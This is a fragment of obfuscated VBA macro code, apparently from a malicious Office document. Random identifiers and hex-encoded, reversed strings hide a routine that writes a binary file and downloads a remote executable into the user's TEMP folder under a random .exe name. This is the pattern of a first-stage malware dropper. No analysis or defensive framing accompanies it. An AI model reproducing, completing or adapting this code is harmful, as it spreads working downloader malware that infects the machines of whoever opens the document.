Open StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("756B6169796D6B656765656A61767079646F6E6D616C6E78656F737A6D6B6467616465676E6C6A68787A6B61786D6F71")) For Binary As #61689
Put #61689, , tcbsngjahhrhgbagbjxnpuptlsigwallfgbolukfwaspdzis
Close #61689
tuzhjiawhipevobwcrisufmhyahllnagdxlgunsyarqbhkmf:
End Function
Sub TFCVDJEJBJJ()
OJFXJUFZDBX StrReverse(trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy("6578652E312F736567616D692F6F722E646172612D6473702F2F3A70747468")), Environ("TEMP") & "\VGOMMYAIMDT.exe"
End Sub
Public Function trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy(ByVal cuvibyucfbvYCy As String) As String
Dim oiuytevdfb4bf As Long
For oiuytevdfb4bf = 1 To Len(cuvibyucfbvYCy) Step 2
trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy = trygplhagjchylsupgoshfzllekxfvpznujnvkbhclgwutyy & Chr$(Val("&H" & Mid$(cuvibyucfbvYCy, oiuytevdfb4bf, 2)))
Next oiuytevdfb4bf
End Function